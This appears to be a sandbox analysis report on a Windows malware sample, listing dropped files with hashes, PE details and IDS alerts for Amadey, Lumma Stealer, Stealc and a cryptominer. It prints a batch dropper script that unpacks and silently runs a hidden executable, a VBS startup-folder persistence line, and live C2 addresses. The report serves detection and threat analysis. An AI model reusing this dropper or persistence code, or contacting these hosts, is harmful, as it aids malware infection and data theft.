                                                                                                                                                                                              Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1827328
                                                                                                                                                                                              Entropy (8bit):7.963282633529333
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                              MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                              SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                              SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                              SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

                                                                                                                                                                                              C:\Users\user\AppData\Roaming\IsStopped.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe
                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):89640
                                                                                                                                                                                              Entropy (8bit):6.349551184218018
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:07Se/hE9pxIN1e8Lf0HbqH5D62np/cvarqWjc6Tpzz:07thEvmuf7E5DP/TqWjBpn
                                                                                                                                                                                              MD5:3C104350CC2661C345673E91ED672C4C
                                                                                                                                                                                              SHA1:D205E94D47949CF3BC3F5226978F6D370C3D3B94
                                                                                                                                                                                              SHA-256:1FB9F279263C252A09F12B69C7238C18D2325F7CF7250EBE24AD9149ABE62CF4
                                                                                                                                                                                              SHA-512:9C02BDE2D096E181F00E906F4E242905D0E54DD207F309764805C7444C9F43073106812ADE97FCA9FC2363F59ED071371276880CE85E9A307FCDB03D3250CF6A
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...FG_g.........."...................... ....@...... ....................................`..........................................................`...............6..((........................................................................... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@........................................H..........................h............................................0..........(....*.*.(....*F w>..(....(....&*.(....(....*....0............ .>..(....(..... Y?..(....(.....s........o......s...........s......+..s.... l?..(....(.......&...,.......io......o.........,...o.......,...o...........,..o.......*....4....H.._........E.6{........9.N.........(.p.......2(.....o....*......(.... .>..(....(.....(....(...+o....*Z .>..(....s.....(I...*.s....(Y...*.......*V !=..(....~....(....*...

                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):84
                                                                                                                                                                                              Entropy (8bit):4.735975947217945
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:FER/n0eFHHot+kiEaKC5+n:FER/lFHIwknaZ5+
                                                                                                                                                                                              MD5:D06A33187454FF90C6D308944FADDD2F
                                                                                                                                                                                              SHA1:F032F8C421A77AB0AFCD31A1B9C08E4F5947C1B2
                                                                                                                                                                                              SHA-256:704C13F29538ABE74138102E2413C526C50FB5A7EDD7E19500F243BFBCD2FE1B
                                                                                                                                                                                              SHA-512:F9106E80E0F3BBDAEB2C94C01397719FD932EC922394A570FB7450D380A41CCBE051A2CF386047EF521D8EE700F66E1CF643BBB009A6776F1E84A1198F518753
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsStopped.exe"""

                                                                                                                                                                                              C:\Windows\Tasks\skotes.job

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                              Entropy (8bit):3.3945681664090745
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:fan5XflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lxuEt0:fef2RKQ1CGAFAjzvYRQVht0
                                                                                                                                                                                              MD5:03C86F73CDE79635BFA3CEAF62A4D729
                                                                                                                                                                                              SHA1:1E4F65E3B77AB1505CB5CDCA8778311E05FD2B54
                                                                                                                                                                                              SHA-256:65669E0DC32682ED88A49F81B70CC68D1BB13A2CDD162BA0C3E2E2DA147A5F30
                                                                                                                                                                                              SHA-512:5AB11C349F01146D1B986C3C3D07B6FD1B0A365737A81F0F258788AEED7499CCE9ED962D3873F107820B4BFEF0E07644E0FC1E7EDEBB5C04995E16C918338A08
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:........:G.E..X.xg.F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

                                                                                                                                                                                              \Device\ConDrv

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):350
                                                                                                                                                                                              Entropy (8bit):5.0682682106683945
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                                                              MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                              SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                              SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                              SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Entropy (8bit):6.580370328881055
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                              File size:3'026'432 bytes
                                                                                                                                                                                              MD5:d2b1682105389a925387227c660abb87
                                                                                                                                                                                              SHA1:9c91cbba1071420b73caad3a2abcfc47360f4f0e
                                                                                                                                                                                              SHA256:65e38a7dd78629bc9a810a0dac0a18f977be82eacd6de5a090c0405c57de7a26
                                                                                                                                                                                              SHA512:452a20edc68a8d76018220fe6f0ed3a38d6211e66b393f573f460fb2f9ec6f11efb4b8a45256ad8c3cae4acc0cf31ae60c4bbc3692f967a34a350fb4e0c080be
                                                                                                                                                                                              SSDEEP:49152:l+OrfMejZNr/UFhowlQSEzzRQA1BehabYJOnbj:lrfdj8FhowlQSuziAOhaaOn3
                                                                                                                                                                                              TLSH:EAE55C527D0571CBD08E17B8952BCE8AA95D07B9471048D7EC68F87ABEE3CC235B9C24
                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Entrypoint:0x71e000
                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                              Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                              Instruction
                                                                                                                                                                                              jmp 00007FFAC065307Ah

                                                                                                                                                                                              Data Directories

                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x344.rsrc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x31c2600x10ptiuyvxt
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x31c2100x18ptiuyvxt
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                              Sections

                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                              0x10000x680000x2de00fc6e0bbaf5f9246c565b16f27bbe017cFalse0.9962693715940054data7.962970695987235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .rsrc0x690000x3440x400982623c07c43a8169da5c3bd55ce4d06False0.4345703125data5.395849414192414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              ptiuyvxt0x6b0000x2b20000x2b1400ae579377a497bee344ae388e8170d906unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              izyqsoku0x31d0000x10000x400b6d6e7c035ceb9ee70269469ffe98c56False0.8125data6.314961780385008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .taggant0x31e0000x30000x2200f41948a398a6e77252cfe959fcac5a87False0.05330882352941176DOS executable (COM)0.9100116403008396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                              Resources

                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                              RT_MANIFEST0x690700x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                                                                                                              RT_MANIFEST0x691c40x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                              Imports

                                                                                                                                                                                              DLLImport
                                                                                                                                                                                              kernel32.dlllstrcpy

                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                              2024-12-16T01:00:05.553095+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450174104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:01:06.506988+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449758185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:01:10.957744+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44977031.41.244.1180TCP
                                                                                                                                                                                              2024-12-16T01:01:13.706221+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449764TCP
                                                                                                                                                                                              2024-12-16T01:01:15.041392+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449782185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:01:16.544686+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44978331.41.244.1180TCP
                                                                                                                                                                                              2024-12-16T01:01:20.575490+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449794185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:01:22.069859+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44980031.41.244.1180TCP
                                                                                                                                                                                              2024-12-16T01:01:31.559663+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4602181.1.1.153UDP
                                                                                                                                                                                              2024-12-16T01:01:33.001691+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449825185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:01:34.557091+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44982931.41.244.1180TCP
                                                                                                                                                                                              2024-12-16T01:01:34.596383+01002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1154.216.20.243443192.168.2.449828TCP
                                                                                                                                                                                              2024-12-16T01:01:36.715089+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.449835154.216.20.243443TCP
                                                                                                                                                                                              2024-12-16T01:01:39.823032+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449846185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:01:41.288207+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44984831.41.244.1180TCP
                                                                                                                                                                                              2024-12-16T01:01:42.214069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449854104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:01:43.386291+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449854104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:01:43.386291+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449854104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:01:48.229490+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449866104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:01:48.958360+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449866104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:01:48.958360+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449866104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:01:52.463306+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449877185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:01:53.116155+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449878104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:01:54.195180+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449878104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:01:54.212743+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44988431.41.244.1180TCP
                                                                                                                                                                                              2024-12-16T01:02:00.256872+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449895104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:02:05.868810+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449907104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:02:06.614888+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449908185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:02:08.099492+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44991431.41.244.1180TCP
                                                                                                                                                                                              2024-12-16T01:02:09.778921+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449920104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:02:12.913030+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449927185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:02:14.569336+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449933185.215.113.1680TCP
                                                                                                                                                                                              2024-12-16T01:02:15.899234+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449939104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:02:19.702966+01002058230ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz)1192.168.2.4616161.1.1.153UDP
                                                                                                                                                                                              2024-12-16T01:02:21.272633+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449953104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:21.272633+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449953104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:21.421362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449957104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:02:21.550012+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449955185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:02:22.301907+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449953104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:22.301907+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449953104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:22.306188+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449957104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:02:23.060796+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449958185.215.113.1680TCP
                                                                                                                                                                                              2024-12-16T01:02:24.074856+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449961104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:24.074856+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449961104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:24.978820+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449961104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:24.978820+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449961104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:25.098255+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.449959116.203.12.241443TCP
                                                                                                                                                                                              2024-12-16T01:02:25.098665+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.12.241443192.168.2.449959TCP
                                                                                                                                                                                              2024-12-16T01:02:29.449599+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.12.241443192.168.2.449967TCP
                                                                                                                                                                                              2024-12-16T01:02:31.553463+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449977185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:02:33.575449+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.449979154.216.20.243443TCP
                                                                                                                                                                                              2024-12-16T01:02:33.940495+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449982185.215.113.1680TCP
                                                                                                                                                                                              2024-12-16T01:02:34.609498+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449987104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:34.609498+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449987104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:37.663059+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449989104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:37.663059+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449989104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:39.274505+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449989104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:40.869989+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449996185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:02:41.431663+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449993185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:02:42.583015+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449998104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:42.583015+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449998104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:44.094358+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.449993185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:02:44.118239+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450002185.215.113.1680TCP
                                                                                                                                                                                              2024-12-16T01:02:47.922277+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.449993TCP
                                                                                                                                                                                              2024-12-16T01:02:48.252202+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.449993185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:02:49.997831+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450018104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:49.997831+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450018104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:02:50.254266+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.449993TCP
                                                                                                                                                                                              2024-12-16T01:02:53.038685+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.449993185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:02:53.710221+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449993185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:02:56.138886+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450028185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:02:59.829969+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.45003831.41.244.1180TCP
                                                                                                                                                                                              2024-12-16T01:03:00.453224+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450039104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:00.453224+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450039104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:01.666950+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450039104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:01.666950+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450039104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:06.049895+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450049104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:06.049895+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450049104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:06.739049+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450053104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:06.739049+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450053104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:07.472738+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450049104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:07.472738+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450049104.21.50.161443TCP
